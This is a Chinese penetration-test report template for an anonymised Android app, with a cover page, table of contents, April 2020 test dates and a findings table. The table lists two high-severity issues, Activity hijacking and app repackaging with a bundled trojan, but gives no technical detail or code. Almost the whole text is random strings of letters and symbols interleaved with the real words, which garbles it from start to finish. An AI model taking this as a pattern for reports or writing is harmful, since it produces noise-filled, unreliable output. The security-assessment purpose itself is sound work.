3 `& D$ p0 t2 c7 h! _
7 x- L3 H ^- Z" l X8 d6 q2 I
7 }* Y. N- [; Z+ y3 t6 U
% }+ L; E: z) p2 s6 N
8 Z. K% m; f8 m; E r$ [! d; C; f) f
% C- k# p% C; P5 K: W& f
* y# Z( o8 k3 [9 q4 v4 g, R
. ~% z2 Q2 r% f3 U
: }" J) b, l2 E: C' u- K( }' X
+ ^" n u% ~) T( G6 @% J
7 Q$ T# j4 h1 s6 k
' d) x" u- ]) r( J4 j 文档编号: 5 ~- a; q" t( e# R7 s' m: j8 `2 M( ?$ U
) m$ j6 S9 q' Y6 Q. `
; A* s$ a* {+ F3 s" y( {7 s; j
4 c) N" f2 `$ S; W4 j* X
; B* o# N9 X1 t+ R$ W
. p/ e; {; W9 e q B7 q
2 ]' d6 g' R/ m5 W( i5 B Z8 x" w) R. @# @) P
$ a$ M5 o* |: K2 B' Q: O
% I3 ?- Z2 X4 G' G& x
8 t6 Z/ g6 u0 c! _" F8 j3 X
, N2 h2 W/ O1 J: n! I9 U ' u+ |* t& o5 u: r" X% c, [
) `% U* L7 r# a; @3 W
6 Y" _* i) X4 G, L, f; G) r) ]
* y5 j b' u; g& |3 L / W! r) c* r- g
9 x* A/ f4 O6 h
% e; f1 J, e8 y# _1 n& ?& [' _+ h
4 _) w$ }! Y: T- R n
$ h4 ], ?9 \ D5 z$ O% I9 n' r/ ^
- J4 c' s& g9 c* O/ F# q7 L6 Y5 U' _: G
5 `2 s& N) ]3 c' Q. o
}9 W9 b2 C& Y/ y' d) }
! n" x1 I6 W- M. U
; E- i7 a- ^, t- z8 n4 o4 I1 T
0 L- @! Z! q+ z5 x
& k1 P1 b V, y, { : B% e! J( B% F
U8 R# C4 d3 \0 t9 ]. l
, c* ~( r: y( k3 Y, a K7 M: e
a, G; j; S3 S! P- e & l$ |/ g G9 ~* F" ?' a% a
0 Y# K, ^% ]+ o7 \2 i8 e h$ @# Z
某某某APP渗透测试
( c1 a7 W H) g8 W( E. z" G
0 {, V% I8 O( h! y, C" w0 r& b
% I x p4 V, t! { |" K0 `% m; L
% G- V$ `& |3 I( n
! X0 T. X, G3 j3 x
8 x( I) n2 B' M" h l" ^& p1 c 2 M* c0 ?* ]$ I
% F" l, U4 q F
+ N3 ^1 U- r6 Z
) W" x$ H; u# Z, Z $ X6 c1 B- g- Y/ L2 ~" f, Q
- T; e& e( ~3 @' `+ S2 B
1 o( g; T) d, W# y& t
9 W' }& e2 Q$ m- O( E9 k
0 Q3 x8 z+ n, C% ~ H& _8 b9 ^( w0 R
: Z' O; P) c* E2 ?. L3 u; O) f
0 [. n3 P! J5 s# C8 A2 g5 z
3 P4 U5 E, Z& b8 _, m
# K) t! B- E9 Q5 S; {. Z
$ Y" Q% f! k+ n6 B' Q6 V; x: M
* y6 ]/ T1 |8 y( v' y2 x; |+ K; h5 C7 ^0 F( t8 W
( c% K3 a; h2 l' ^6 C& C S4 Q& b B
1 x/ m z. Y0 e" e* t' a/ A7 D" p$ R
6 D. t' y5 k! i
$ Z$ V" M9 F ^ 0 ]* d( O$ `0 U4 W4 {% U
# o: I5 x8 v8 Q( Y 技 术 报 告 9 N" x) d0 X) r8 P j& D7 l# P
% G' S$ _% S+ H: G: y
& x+ ?* s1 K" }
, i p, [ \) c4 V9 h- H7 i
6 |7 M5 F& K6 y- u" r d' ~* \1 K
& U# Z# |% y. f. \) U & A" N V$ r/ f# S6 \. u* J
: F2 P) f( m0 G6 }
; U* B) m3 L' V0 U% f
# _7 `- K2 |: s( x4 D ) F5 k9 s* N5 t* | P7 C
4 O; e: u) R2 i, N# ^+ \
4 v4 g- ~- ^# m1 V' Y. ~" C
6 Y! e+ q3 |0 a. `5 V0 a: V$ ~
1 I8 ?- A/ Y6 ?. p4 `$ H* {; W1 a
9 i( y0 `: H1 C9 ~0 J% ^' m
# R! g) g h# Y* h7 U1 o+ \9 x5 j4 O9 C
+ i1 \* b5 a( M" N" u
3 g- B% t' ]3 z" V% h
5 V) P' I! I6 U# E! H! f
/ f3 y; a8 Y9 ^7 q" K# I
- A& v7 X4 L4 q- {2 N0 m% X# v" l
3 C0 Z# C$ ?) e Z7 y& V$ ]
% \7 \% u4 ]+ r( o8 b/ l; A' L
& y; O6 k: J9 N: W v7 Z) z( ^
8 N. y% T$ a( j( W; B8 B, T. [
) f' e+ Q) f) Z 0 k6 {2 n% I6 O, f* D# S5 R4 `4 i; M
, E( U- M [5 O# i( I
U3 {1 a9 n5 k* A
, K) l$ H/ {- ^: p, n/ w
* Z6 N+ b6 J" A/ [" P* }. y
: y5 W L: l7 |7 ]3 ~5 y
* O5 e* m8 \# ~
0 g( Y; @' [+ `* h( K7 { o! h0 k! W- M# f6 W9 i
" [- [: d4 I1 g$ I
3 ?# }# u' j+ d" }+ }
" R% R5 }8 G2 x" ^8 o, l $ T: A, y+ E: K V
7 n3 k! f) m0 e7 X$ j+ G2 X& m5 K
, ~2 ?% L) I3 ^* \( j* i. _2 \- e6 ^0 L; O
2 D7 z0 _- [, j w: R1 k' s. t
# j8 D7 w* J q7 ^. D U1 r$ J% m0 h
. p5 z. U: j$ o4 ~2 {4 e; d, {
T& c# {( W' b ~
$ Q- b+ C) @' C3 h3 S8 p. W j3 M/ N
- f/ h9 L7 u* x% S1 W: y1 n* Q
$ @) A9 i* `" z" M2 c 7 Z$ d3 T4 A1 b0 H g
& d! _0 m( u e" p' \8 {$ t9 _
, F: u6 Z1 S* p3 \/ Z% g% ?4 m, Q: f! W$ J7 X
( R E/ j' \) D' e; l/ Y# P* N/ Y1 K; H
4 J0 U' W% j# |
- \$ P" y$ t3 R- O/ c& p P! B+ Z( S$ L/ a
6 A% ?7 ]. j! z
- h3 k, \! ^7 Q `! z: g
- [( f- Y+ ?+ |( m+ a 4 E2 `; V* f, N6 j O! c
2 Q q4 `" b! r3 [, p3 |) y3 K + D8 i7 u: o; ^0 h3 r% H4 R
& K3 S4 {4 k$ e5 c. }' ~
# \: U: v( ^$ B- s
4 q3 J8 L5 q2 x2 @ 6 T- k! U8 q- O6 U; Q
( H& }5 B4 X: B' k
6 \' q! X% F; x# Z3 }
+ G$ A& g) C, P
: N& N" B1 n4 h
2 u5 D" p8 @ ~7 D% U% t
- k1 O1 k& ?* C% ~5 L
) i9 E6 K* h, {1 F) d8 g) x* k) v 1 k% {" I6 O8 B% k! b- }& x
, d5 ~" H( Y6 b* E1 o
* t, D' p0 @9 C; z; R7 R2 Y" F2 q
t5 d; O# y5 G% y' j/ f! x& y
; G; U9 j1 D' T+ A1 E, {5 c: t
# `2 L- ~0 P0 [0 F" [ 2 C' \& _9 a( {( g
- F+ F4 q& m' M9 U( z7 o
+ P( h' b0 p# x$ }" b& [$ s$ M1 P& }3 d3 \3 Q
. q/ h( I$ p0 t: D& [+ i3 t" W6 n- O
/ L: l6 @4 S2 E, `
4 f3 M& k5 p4 B
]6 Y/ c: B7 p! f9 K
: Q: |# |9 d4 ^1 ?/ m2 K ; b% F5 u# K! f3 ^4 O
' g9 x' p0 X* B1 R$ e4 `
3 _7 B3 I" y& {. m$ s
2 J2 D# s8 H T2 \4 w
0 i s) _9 X8 Q' X) i5 L- p
" P1 H2 n" ]0 W
) h, e6 h+ S' D( J# N
, Y& C0 }0 r/ u, N 1 S2 w4 z' a8 ]0 n i: d4 i: `1 }
$ i/ i4 _% [+ o4 c8 F
. `, ^% I$ a4 }- t% x( m# X( s6 |7 ~ `+ }- V
. C" \# R& J2 B7 t% G G0 l; Q, @! A! G! S6 u% f" V/ `
' q0 y4 G9 F; C) L3 o
( b( |5 @+ Q7 X& G8 q8 r
0 s" }5 y# I( F; Q3 R+ r1 E; L' `4 _; r1 t8 J2 O( e. y. b
1 t6 |! i* P% }: _ P, l; a
3 v* f6 {6 t/ ]$ E, k 二〇二〇年 ( ~! k4 t/ ]4 o% @0 P
- Z& N" ]# b7 {
8 Y1 f N# \2 g. s' f
$ z4 E8 V: z4 D; Y2 I3 X 2 D J0 c& }: F6 ^
: T- t3 K- G' r- J/ }- R4 q6 v
* x Q7 h0 g5 ]( J! ~- t8 j, c: Q1 N% d( \, l5 \$ j
( o4 C5 ~ a9 I" b$ F" H' T
; L( @1 h6 ~: D9 R% ^
. }" M7 m4 H) V: O
U$ o4 U! o, e, a" |: s$ H& X8 y
: F( r1 H3 [0 ^
. E$ L6 D8 R0 j4 f L; `6 K% E
; J/ E! A9 T1 l \
. U+ y( x7 x# h$ t; _/ s+ b / ?3 F( z. ?( ?5 t
# M! g7 w7 [% I3 i
' |6 Y/ _$ n" X& G- s! }# T4 W+ n: j4 ]3 \+ o/ K1 X
( S( J& o. [1 G9 @1 A
/ [ k: T7 U! R) G' [2 W
目 录
1 j3 m2 b, R7 @8 e* d) |! V( X8 m( M6 K3 O7 G7 [' v" ~' q
' c5 H6 ^" r1 J. r: `
% a% ?5 U3 r8 {3 ]6 J
- Q' F7 M$ ~8 b9 T+ y0 C/ v, t4 [. n' V
. }# u3 M- H8 I3 N. ]0 |9 M# E( q0 V
; F8 i6 a+ A% y/ e
( \. q% U1 Q) u3 B: t1 H
2 `3 I. m& g" E8 U2 \
$ K2 e, J) t' ^& r4 J
" n5 Y# c8 ^) d `; K 9 B+ w [7 h) v* F( [& `
8 b- r2 ~6 @& ^/ H5 r) b 1 概述... 3
, h( b/ s7 a& I# [: T3 q! q
9 e/ T* L) {8 j8 j( X
" M3 W# }6 s/ t! j+ O
3 F/ ~ ^7 M S$ G% k& f# {3 Z
) L6 P+ `$ ?8 k0 | J. ?/ C# H1 B5 S+ J3 b0 y
1.2测试时间... 3
3 {) k4 {/ E F, y1 u
0 P* H n- I3 R1 M, `
' q1 @! Y; |) d+ \/ i
6 H# c4 r0 X; o& F( N 9 o! V8 R/ b }: ^( x3 y1 _# Y
: @, Q: H3 E9 V7 {* m# D! A7 K 1.3测试对象... 3 * T' C U5 n; O2 t
3 h( X2 C+ c* t' t( U5 o# r
4 v. F" @* v4 ? ]5 s7 Q7 G; A
1 N' ~9 i" G/ X1 V3 [4 P
- o7 |! k/ F4 B
6 {, O9 w8 I- l 1.4测试结果... 3
8 _# Y! T% ^( h: Y
- I5 d0 E+ C6 U3 r# h* q4 w
! K" D& }- ?4 P5 Y+ ?5 g: G: d, C: g! ^9 {$ Z
6 o7 P7 l0 J6 v1 w' R# t$ H2 R/ L( e2 _" E% x+ {( c, \$ I" o3 s
2 检测结果... 4 9 F, A; e; [1 y3 N
+ x' o& c( y+ W+ E) M
W; C* u% ?) p& w: b# h) U$ \& G* A/ p& T7 x
" O$ l* D7 r% J4 J
9 g" ^2 T, [* S( K2 g: S 2.1 某某某... 4 / h2 x- z! ^. r& S* ~. L1 M! J
) w [3 S' m) m6 k' m4 Q6 u
- E: l9 Q# L1 M. f5 a8 C
7 o- T3 C O) u! ^
9 ~5 y4 B- N: D; l& @7 ~. N
' }- t, w: F0 H. W2 T 2.1.1检测目标... 4 7 L$ O+ y' \0 G* t+ Q
: E f; u/ Q$ G0 Y
+ f! G4 {" @! Y4 i6 |5 o2 E
9 z9 [0 k2 n9 f4 V
) D; G% A$ k6 c q5 m+ p$ U, x- y% i @2 n# z( k
2.1.2检测结果... 4
) k# b6 G G* l# C: ]7 R9 P$ @5 Q' y0 ?5 { V
8 x+ K' |% E9 r
7 l% v/ e7 k2 D9 L- X t , ^8 u* K" G6 i! K
+ R9 y* f; w- @3 d& w 2.1.2.1. 4
9 F, J- g2 T3 F* P
, | r: {: l9 i7 ~# [ H0 @' w
! R4 A- j( Y( g; |, F. s, r* d" ~2 Z. w2 u' O; Y6 [% j
8 v. w( A8 D% K' ^
4 b( T$ b6 r* j4 u& w. F 2.1.2.2. 6 4 V) B# G) Q1 E
& `. u. h6 @7 Z' [) v* t
' u; W# A2 c, Z# j* u
j8 Q* p8 b( _2 _ " x5 h! M! P1 O& C0 Z7 _! i/ Q, y7 f
0 ?! b5 Z, T; `7 ~: q# R ; y3 E2 X0 [3 B7 C9 m$ m
" y3 Z) n: o% N* D. m) P- c4 u3 Y
7 I2 r; O. ?( R+ P! A
& ?* _& l1 N+ j2 P$ n$ n
- r( ]& ~- I$ M2 U. y5 m
' \- B5 ?, N$ M( E8 K
$ C0 Q" X1 ]. T s9 a1 p8 {1 j
, v, H* B, W2 x8 p7 o- ]7 s
$ l! M/ g j; I7 `9 ^
0 K4 J/ {8 r+ i, }& B L0 ~- I$ u: p
( \$ D. f- N( }' ^0 s! _+ w: [: u2 v3 t6 W U
$ K+ p- e2 r- ]; @5 w6 |& k- M7 R
1 概述 ) U# b" d5 L4 }
" H' d( j5 x2 z1 `/ i2 v
7 q+ j8 D1 j/ }% v$ ]! A
+ S6 w4 `) C6 ` l, K% W
! N. |' {9 P" W2 m3 D) ]
, _: A7 F6 c5 K! |, O- ? \ 1.2测试时间
) y+ ^( V3 w) w; F% N l
4 N/ S: t7 v. z4 p. H% T
. Y8 T3 T% Q; b- b3 Y0 t: ~
2 i8 o! E5 P" A8 O
) ?$ X9 N2 k' l ?
" T' G3 L) O, ]- J4 N
! G5 t% _9 A! l% _2 P8 J9 b
1 r; d1 @% J2 t
" X4 X |4 d x- u/ [
# a4 ] O# M$ i9 `& E& D9 A
| 4 n3 C; S" `# v, D9 ?0 r5 z: K8 h
4 U- X# k `( U9 f & }' h- b2 w: c0 t' F2 u& n
2 Q1 q; V, M! S$ G0 r* ?8 j0 F 渗透测试时间
3 m% b' h+ P: s9 Y- E+ u$ @% r( P& F$ u# b1 i
3 m: {$ _3 ^& n3 ]1 y* o
; \% k% [+ X1 s \: t. P
|
; ]2 j: N- G6 o! S2 {6 H7 z m/ V( g, C/ S
! Q0 _# A$ d/ d7 T3 `8 l
( d7 ? k5 k) f- o6 r
; g$ z5 M6 q( B: _8 g! V, r, q: m' Y: l7 }5 n
| % t$ C0 t3 h- R& M5 Z3 t, O
$ S1 j" n4 o* r7 N 4 a7 @! T) r1 {1 K9 g( P8 q5 b/ b. S% c
6 m+ N% ?2 F9 u! R' q" E$ w
起始时间 5 |/ S" |0 _/ n3 W
6 u0 v4 q! I6 E M( t [4 z # j- U' a f; ?/ P* F6 w
0 g( `) o3 S7 v" u4 u |
$ ^+ `+ S9 r. C5 M
5 V5 T' f9 A8 |: z, Q/ l 4 l. v( g' ~! A0 U
& C t& j5 Z: O 3 c) R5 d0 {0 J" a/ D6 Q
( O5 P. \0 T- d& R, |
2020年4月6日 8 z+ ?! S* K+ [( Q) M9 u
8 x/ o/ N& Y5 w% ]* j7 J1 x/ ^
9 t2 h& t9 H& @; E' W; V
. R+ w+ I6 g: {& t |
$ S3 R* C1 ^8 D+ M2 I2 n( {2 s' x. b7 w2 X
, K R- X* h6 k( n- L, Z7 c* @) J6 U
7 A" U# D/ C j/ X7 @; t+ X$ |! Y ~7 J
| ' I: A. Y x1 _) ?# P
- V3 b% j+ O! R( R3 `1 K6 p2 e
: O8 ^4 Z1 c# Q$ h' p; ?
' c S$ p) q d: { 结束时间 ) v9 s. e; d( i0 Y- D/ s- ^
9 h" U) ]# T1 l- Z0 A ) o E$ }( T( c
+ c) d6 L0 | k6 i$ L h
|
- v: b; ? y: ~3 E1 |. t, H6 E b
: Q$ s" O1 r+ e2 H7 }6 \2 u
, g: f; x% k# N1 C: j0 x4 m
6 [8 ~! d' D2 F7 m " w% b5 ]1 X& q7 ?1 E8 S
( Q2 p) e$ o$ z" _* v, L+ k$ ` 2020年4月9日
4 r$ A$ ]# J3 m, {: y6 b2 f; ^, p4 Z. V D; _' N2 f
. d, m/ H5 D( C) z: F8 S& s& n+ v& W. Q/ @# T; |1 y
| 2 h" P& n" K0 W0 ^% x
: n: M- @+ F- { s: ?* Z- E0 A6 ?
! H0 p J% q0 ~* _; d& \0 O. D
6 s4 Z, ~8 b: i* w# G; B/ i
+ u8 i# \/ ?& D$ Z$ C& n9 @+ Y# }0 o. C8 y$ F" L# e& X- n8 f1 x m
1 i, a8 u! b4 ~3 T9 m8 o
2 f/ P* ^& ^5 M5 A* A0 B 0 B1 \: m: f$ [/ ] C$ K
) R( m& N9 E4 C. _) E
1.3测试对象
8 O8 p; D! {& J( s
& {2 A. Q- P. g
8 |/ d: x; c, O0 \
% \) Y* |" \8 N8 v3 w5 Z1 R; e 3 A$ `, i. d/ l' h
+ ~0 ?# k, f: ? 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示:
' Z( d+ k/ ?2 u6 `* i6 x6 r! X" S( d: v( f$ `+ \3 R
. E( O$ C2 |& X) V
' w) n) r/ s- k& b8 E0 A( _$ X
0 }0 f q4 Q b& S& }; F2 ~# G9 Z
表1-1 检测对象
! U1 P' m0 l/ `8 O) I9 `2 }/ g) {, g9 ]. |4 s e e8 I7 k
+ ^, l6 Y& t2 {# B+ ~6 }: A
) Y' k2 c# V! V4 v& d/ ~5 ?
) l, N% g( Y( P1 W2 v0 H6 n
2 `. A5 m: p, R1 F" E: S3 g! o# S
9 r2 A9 }. |# t: O% F# J
; C C% D8 }) E7 v' c, b$ F+ X' e 9 i& Z# Z% C0 S$ S [. r
9 B9 p4 i, _, o7 J8 O/ @
| 3 Y! ]1 Y! v4 n5 M7 K
C" \7 _/ X9 ?8 M8 j9 c2 g1 y) `
+ }+ O* y9 R: x+ {
. b. U4 Q+ V+ f2 {) {$ C) ~ 序号 1 M4 h8 ~8 x! k5 }
4 |; N: d/ l+ v( k! m 1 W* P' d6 x; q$ h- \) ^
- \6 u. v8 i* `9 j
|
+ k: C4 _7 N5 r7 ^4 @' Z; [0 y/ b% S: m8 {# _# z
! z( G' a# l- x+ N
6 @, i# v" x3 `: i
' R8 p; J" K: ]1 c/ G+ O$ f" B) r y* v
测试对象 % I2 Y4 E' y% S. w
, j6 b" C! y+ f/ T* l
7 R7 P( a1 V7 z* k* \5 H# Y' @7 y! T" O2 L, R
| : P/ A9 K! ^. _- `
; |! R% F- a/ v* C. G - m( U+ k7 ]- a1 ]+ Y; j
! U& s1 {/ R% \. C% U) C6 A% k3 l- k
4 R8 v8 S; {3 l+ o9 @6 x- r
% u d, j/ C- n' h o# q1 l: ^ 测试地址
- m: m3 t' Z3 \" N, p$ b( w6 o0 @% Y- i& b1 P, W$ u
; R5 `, {5 o: Y y5 w" P: G$ Z+ O: j5 F* D" z, O+ @: |
|
, Y5 Y; I0 `* ~ ?) Q4 _
; W' D# d/ b3 |) n5 u , c" |& I0 z. c' S* O o4 @. F
0 m/ W1 _( Q- X* U o( {) e
# k0 O7 g( c- E1 E1 t
" x( y6 d/ z6 p k; b, _( W 安全漏洞 : U" r* J6 M5 s) j) C: x2 h+ @
6 Q" W7 S% t6 ?2 c$ a5 a1 I' {
! k" j& ^' z- P0 D- w1 M# g
0 N0 C. l% L! x8 _5 _4 \5 w |
" H! B7 }" Z. k' h
' o. H2 `! R4 E" b* L. ]9 ~
. C: s/ N) h" k" @
% g7 `9 i' M* B+ m7 Y7 t1 V! w7 } ( q6 l. J2 W( F) L, Q9 t
8 d* z9 I3 `3 ]6 T8 G
|
1 y# s. A3 L2 W2 i* j
/ M+ e0 m9 J0 v' v1 E0 ^7 F ! H( ~2 s! S7 E
9 T+ U( s4 W9 X 1
0 Y( t7 X- s+ D X+ S8 c K2 [$ {- y, _) e: E# M
' \, g, a( @& J: _$ e0 j
' d1 T& p3 [$ {/ c+ N: c7 A; H x% o |
! {% | _! \0 I- e0 V) y" G s
0 b) J, T; k# y6 S; [# n$ Q
4 D3 [+ d2 p( j' }/ U2 F( o4 P+ g |- m# V) _# t
% M- @% }* p2 t' R- P( Z: R; x& G
7 P/ h% r3 ~, [4 s
某某某安卓APP : w+ s$ m3 x0 x( t: w! }& u
. o6 F* x# n0 f3 {4 j0 I j. z
0 G! A9 u5 ?2 T5 @4 c8 [# F3 H0 q. y* U4 n7 H' {
|
% g3 D( {( T7 a! p0 k( C3 k3 F7 Q7 S$ x5 @5 e" a
& Z6 J& B4 J* [- D6 B
! Z2 b( l- w2 w- y# T& p" N( M
$ p4 w# y$ A/ w! Z
- R& J m3 F- O. i
( x" W, g8 \7 g
8 _5 l1 U+ Y r, d G& \
2 N2 l! M$ S3 a _" B. H+ \
9 l( ~% m9 B2 s5 G- {. M% O# O; ] |
- f# s/ H( ?* J! R2 R9 K8 N0 z' K9 x3 |7 M/ y. ^
& N: A! g8 \, d S. }: Z
' u+ n/ }. G( f$ P
4 F9 O- g/ N+ J+ [" l0 Q9 v! o, [0 t% q
2 ( d$ K$ ] T2 z$ w% q* z2 r
2 ~, e! k* [% P/ d: L
- h% D" c9 C3 X) A- a7 ?. j f
. Q0 t$ m# n! U8 P3 P% @( D |
0 p- n/ `* v1 u$ F6 P
7 H- G+ @% i X( G7 F9 g# G5 ?# u- a
) L1 J' O! @) Y* U4 {- }% s$ G# S) r1 T9 }* w1 N4 ?, p5 `
" ~. g! `/ [7 x1 n7 K* q2 `
! w, y* v1 n8 u2 b# S6 C
9 u! A& f7 X9 }0 j* I
/ r* W0 j& y. i$ y
( f# Q3 x' k6 r: ~1 T! y0 A6 f. u0 g% W5 `$ L/ k9 l. ` e% ~
1.4测试结果 - g s1 \, n6 p& S
2 `" ]+ W- |9 S! j# ]' x; ?
8 U/ w0 p2 _6 r( `5 r
2 o9 n0 V5 }& b& ?9 v# B
4 ^) ?8 B6 L* `9 v$ M3 h2 W$ r" v$ N" H" t/ T8 a: B
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 4 s i0 }' Q, q. K& I i
% K& l' R# g9 I0 b) }% ~ e
6 w% N5 M! j) H, }2 x/ g$ e- J
% Q" }& V5 i8 M" {1 L# ?! a& [, k h- c1 i
( u2 }1 N9 W" {$ r" W4 l9 @
?' W6 h# c9 H( n, W
7 x8 u( J! p% o# @
7 U# l7 {9 g2 Z- J- r, Y" s; U% e
, P; ^% g/ z- P- U3 f& n9 {, R7 c
5 m8 G1 h$ g: B( s4 p; J3 A4 B
7 I: k2 \. B' O1 G6 }7 `
: y$ }6 F, Y- d$ ^; x1 h+ \ 5 f; l3 ]0 v- n. O* W0 w2 y
( u |% a8 L5 q. C
5 R8 r `7 @& j
: S" b' x- N2 R" _, R x( ` | " R4 N l# p( y) Z6 q& P3 U/ }& [
9 P- H o4 B5 N* Y: n, O $ J3 h3 i3 {! a, k( ?& O
' m3 t7 l- U8 |6 j0 Y
序号 3 }4 x# Y E& g
e- T) }$ N+ f* \6 u $ }8 C7 q- \; Y3 T9 q8 x7 U, f" C
# W7 X& j# w; C, y5 `
| 3 y6 M1 Z$ P4 Y
8 T6 Y- Z6 |' V* Z6 b
' ~. c1 @- O! c- g/ I5 M
7 E5 u; W2 N E7 U" r& ~3 o ! M0 N! \/ D- g# L2 Z
1 ~7 I. r' _$ ?, x 系统名称
6 t- D" R7 j: q3 F+ _3 d- L% z' H! K2 B) e+ x+ z: N
* C5 a! d! Z4 e: S T' H9 s
t, }3 i. d! ?4 k
| 1 @' c8 |7 f4 w4 E4 |8 m) A( C# ]
5 ~, p; K0 @2 @- b
3 w2 ]# D- y. i/ L: i+ r0 v
. t+ J f) w3 j% B! _/ `# f' d 0 l! p8 p+ C: ]
9 l# a) T# ]' M0 l5 A/ I( d
漏洞名称 ; H$ I: Y( C6 g( T
$ L" z, \5 [2 g n& z- x& Y ) b5 M) u/ \1 U4 g( K7 R
1 f1 w/ E R. ~( ~
|
! n& h; b z% I* u7 w$ q% J
F5 J$ i5 y1 i* t u
* v& P7 [ x3 e# s; M6 k' R# @
3 z6 }, x1 X- k5 e' A3 t
v" i, G1 [9 s. P) U W+ m; u0 o0 }6 ?
漏洞危害 $ j4 h7 C. [ e. F" z
: _. L2 N2 [; X) G. w% n2 I" n ' Z" K# j; B0 I/ }
4 g' ^7 j( I- U! v
|
& [6 v+ K5 I4 j6 t% ]# \6 ^, V; r2 s. z( F+ [/ f
" W+ \5 M& c6 d, X$ l& G
1 z( K& O# x' t! S9 e
, X6 O+ G8 O* D& D% g
/ Q; k- f3 A8 Y; V, A& I
修复结果 # p i1 f# j, }+ f& m' u7 T
, i- `; N0 v8 i2 \% }5 B' f, S
X2 A) y1 ~' c: s$ U/ _7 d" n5 y6 `7 K/ z1 p4 y
|
, _% |0 E+ B9 F, q) S0 ~- |3 ?
3 h+ [4 L, F& |( E8 \" s! k7 [$ i
6 y- N" Z9 C8 _
% z! b$ ^( `9 Y7 h8 N( u1 J / g; D+ d' [. s2 m7 y
% n, h$ p2 Y4 y1 _' i. f
|
J9 V" U# X9 S; t, ]0 |" c
+ M( n x, o* n, d! H1 P C/ q
7 c, j' v: n7 u9 J9 ^, J" k# s9 X N5 a' ]. p! @& ^7 j
1
0 n4 O7 d9 r& Z1 Y' J8 J+ C Q2 b3 K( b# T* o9 B
% Z8 N( A3 X% o+ \8 l7 s
! I4 A" t- q( N# I |
" R8 b5 r" q% L3 x; t# O, [/ t7 B! o! |
. J# u4 V8 L, O4 K4 k
~: |" M9 c& [4 v6 J. m/ l; Z
1 c1 R& X R! m: j& c% _
# V. N) l5 }6 @ 某某某某某某APP
# j2 I# r( W5 p4 z; a2 e- t
( {" ~# T- \/ ?1 [
$ Y t0 a+ p: ?4 {% A j' j' c1 R% I
| 7 X$ D! `! J( U) |, S' X
1 }% @8 W, x& P: W Z
+ M( I: L+ l# t7 R; P! x% j7 v
5 P; [ f4 N& z& |+ u% l
' X# C8 p6 C/ R% F4 d% l. c
Activity 劫持
. d4 h' g( U0 s3 r1 t0 `
" b' g+ I# U# b0 ^% s. e0 C
2 o9 s/ f& l9 M' {# h4 K# b
4 d8 L9 U( N3 `$ {. @3 d& }: T! z
" Q. a( S5 Q. \ Y, \, u$ |3 |) @; E5 }: [" D" M, {" i
$ H4 E- {" A( i8 C4 S' ~3 t6 X( e
3 s6 U( A3 I. U
. \( b( P- o R
0 S* A; F6 u2 x, Q | & c( j9 Q+ L# W m, Y- h8 q5 b
, D) C3 D" U" y( y" n ( W7 \8 `* R) M$ V9 A- r
& U6 o- U( A8 e; W( G1 R 7 V4 L Q3 [6 r9 s/ z8 t
1 _% c F! Z7 U+ g' o
高
! `4 f( i. O- u5 b! k' M% J% a
. d- j3 v" x1 N; _5 J. ~! m 3 x* g0 B& _& ~) [$ K9 ^: o
5 }4 P. S) Z/ L7 H- N% V$ X
|
7 r$ A5 S4 f3 A" o
3 V8 T# k2 H- Y6 @5 y9 c% g: p 0 ^3 q/ `7 ]" G% v s% g' \
* n& d+ L/ X& k$ L; Q
4 }; y1 S2 j |9 v5 A- H+ ?7 R! s# E; \ K1 d7 ^
9 r7 ~6 ~7 I3 v7 u4 [& {
/ q9 K8 b( H; m- S% { H 1 k( g. U1 w9 i
7 S. u5 ] I$ [' c% C' o8 x9 F. T |
$ o. B$ n% n# N1 q: z
: }: A/ L7 A+ z) {5 J; E; e% W
$ j4 v$ h1 `6 L! f1 r( u/ B" v4 _9 X4 c; P
1 m T9 Q% @! c& p: C( \" H
' K# I5 e& |" g# t8 D |
5 M; s9 j1 n& H! v+ _
r" Z) h/ ^- g0 ^
$ r2 u4 Y" P" C# x; |/ Q/ d3 |: Y7 q2 w
2 $ T/ S, H0 Q: ~
; S8 P U+ D; \) J. j: z' E 8 |/ n$ \4 a6 @. f h1 t
% g) S, M( t: w- V* l8 g: f- l: |7 `) c
| 9 ?7 T- }* {% }$ Q8 [1 U
$ Y- o% r, m4 I4 y! q- l" T
' J3 c' Q7 [9 O! ~) w
5 T- ]$ t! [1 G
Q& t$ c6 W6 F/ l4 r0 V1 y" h: y: P
某某某某某某APP ( D7 a9 m7 `- v6 |8 \
# f9 b' {; y0 [3 f ) l- W! |3 l! x7 Y! N, q* H
5 \0 Z6 T/ d1 g/ V% R8 K
|
1 h) G @0 g1 U: J
+ M) A9 Q6 b5 m: B
/ b) Q. w! Z$ b3 l1 B: y& ?, i5 Q/ s, E' U8 m2 A7 ?, `3 ^8 R
: x; `( |. ?5 H$ C$ g
8 y4 V, ^( }" N; R
反编译二次打包捆绑木马、篡改APP代码
' _# a- g8 l% \* G6 A, h* j' _! [2 X( k$ o- R# C n( S+ T4 t9 J
! z9 e I. |* M0 l- \6 d" M2 d' u) n6 k( O
$ {! N6 u% @6 E3 _2 k8 `
|
2 d4 f; H3 w# i9 L
6 S; }9 c( b } \$ `; P1 k; u 0 A$ U0 h' a% V5 Y' y" f% @
/ I% G g: ]' n4 u
: X7 r7 C) E% N" Z' X1 Z& ^
" A0 o, B3 n' ]7 a* ^ 高 $ R; q, [; |( \$ }0 F/ f
" Z" o! I {7 _$ ]" T+ Y
! G& W V1 ^" T. T& z. p% a8 f2 G
| # V" ~8 y4 x8 e( ^8 t0 v
6 ]0 [/ h& S4 S. y
5 K3 s: _4 @) _. r q' V) }$ h$ B; L' z s4 b6 e, H( N
9 ~, c8 O1 T6 l f
K7 y$ t, j) r) y% |
% F- |0 ^4 _* Y# I E& P; w
3 _# Z6 d0 Y7 [! C( [# ?! Y2 }: Z
& h ^' `+ }0 a' T Z" h" E% j; J7 r7 u) U; o- D
| # T" s$ j& R1 i3 m) ]/ d$ g% b0 c" ~2 A
$ @2 w/ t& a& t2 F! z! C8 K! V
$ A/ w( r+ ]/ ^; A* {1 F+ Q! v) }7 Q/ Y' g- Y6 r
( e- W- {( v. f( H, d8 U4 c. D1 I/ j4 x) Q) K& K# J" ]2 ~
3 M X! T+ D, S5 y$ `. d3 w% U, Z T) Y" `. ?% `- Z& `- u6 u
, K2 P ~' Z- h \: b4 Q7 i8 H7 H1 ]- B- P' J
8 r/ ?* C( N" v' A6 w7 i, _1 D
1 x1 w: V/ |; P- n, u/ m
4 y7 _/ ]4 Q9 j
# v! w' K* H: _. V' p( ]8 G
?" k- s) ^+ T( A+ R) j# n2 a
3 W! Z/ F- ]) b) }- T1 R0 h
